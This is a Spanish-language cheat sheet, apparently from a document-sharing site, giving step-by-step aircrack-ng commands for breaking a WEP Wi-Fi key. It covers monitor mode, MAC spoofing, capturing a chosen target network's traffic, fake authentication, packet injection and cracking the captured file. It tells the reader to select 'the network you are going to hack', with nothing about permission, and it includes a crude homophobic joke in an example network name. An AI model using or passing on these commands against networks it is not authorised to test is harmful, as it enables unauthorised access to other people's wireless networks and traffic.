Está en la página 1de 1

COMANDOS PARA BACKTRACK [AIRCRACK]

airmon-ng // Indica que tipo de tarjeta tienes (mon0, wlan0, etc)


airmon-ng stop wlan0 // Desactiva el modo monitor de la tarjeta (NO-Promiscuo)
wlan0-->Tipo de la tarjeta que estas utilizando.
ifconfig wlan0 down
macchanger –-mac 00:11:22:33:44:55 wlan0 //Cambia la mac de tu tarjeta.
airmon-ng start wlan0 //Habilita el modo monitor en la tarjeta (Modo Promiscuo)
MODE MONITOR ENABLED ON mon0 (utilizar este tipo de tarjeta de
ahora en adelante o el modo que a ud. le aparezca)
airodump-ng mon0 //Monitoreo de redes wifi cercanas. Mientras PWR es más cercano a
0 más cerca está la red. Se recomienda desde un -75 hasta 0.
//Termine de escanear redes con CTRL+C
//Seleccione la red que va a hackear y copie el BSSID de la red en
cuestión. Además memorice el Canal de la red CH.
airodump-ng –c [canal] –w [nombre_del_archivo] –bssid [bssid_que_copiamos] mon0
//[] Los paréntesis de corchetes no se escriben
//-w = nombre del archivo donde se capturaran los paquetes
Ejemplo: -w clave

El número que nos interesa que aumente se llama DATA. Este nos indica la cantidad de
paquetes que se han capturado. Una cantidad aceptable es 10.000 hacia arriba. Aunque
hay veces que para descifrar la clave se necesitan 40.000 o más.
Como verán el número puede que avance de forma extremadamente lenta y tardaríamos
quizás días en saber la contraseña.

SOLUCION: INYECCION DE PAQUETES.- (EN OTRA VENTANA SHELL)

Para inyectar paquetes introducimos los siguientes comandos:

¬AUTENTIFICACION FALSA DENTRO DE LA RED

aireplay-ng -10 –a [bssid_que_copiamos] –h 00:11:22:33:44:55 –e[nombre_de_la_red] mon0


//[] Los paréntesis de corchetes no se escriben
//-e = nombre de la red Ejemplo: seba, sebaGAY, etc…
Para que la autentificación falsa este correcta debe decir algo como esto.
Association succefull :-)// Tal cual, hasta con la carita feliz.
En caso que no se conecte, indicara que la señal puede ser muy baja o se haya
protegido de alguna manera de este tipo de ataques.
Si no se conecta será imposible inyectar paquetes. **Al menos de esta forma**

Luego de conectarse existen dos maneras de inyectar paquetes. Menciono que la primera
es la que mejor me ha resultado para mí.
FORMA1
aireplay-ng -2 –p 0841 –c ff:ff:ff:ff:ff:ff –h 00:11:22:33:44:55 mon0
//El comando comenzara a leer paquetes luego que termine
presione Y y luego ENTER.
A continuación visualizaremos como la cifra de DATA comienza a aumentar rápidamente,
esperemos que llegue a 20.000 para estar seguros.
FORMA2
aireplay-ng -3 –b [bssid_que_copiamos] –h 00:11:22:33:44:55 mon0
//El comando comenzara a capturar paquetes enseguida.

DESCIFRANDO LA CLAVE
Una vez que hayamos capturado los paquetes necesarios podremos descifrar la clave.

aircrack-ng clave-01.cap //clave=nombre en donde capturamos -01.cap= por default


si volvemos a capturar con el mismo nombre sin reiniciar el
pc debemos poner clave-02.cap y así sucesivamente.

Comenzará a descifrar la clave. Si los paquetes no fueron suficientes indicara algo


como TRY next 40.000 Ivs. Esto quiere decir que debes esperar que se capturen 40.000
paquetes para el próximo intento de descifrado. Solo tienes que esperar...

También podría gustarte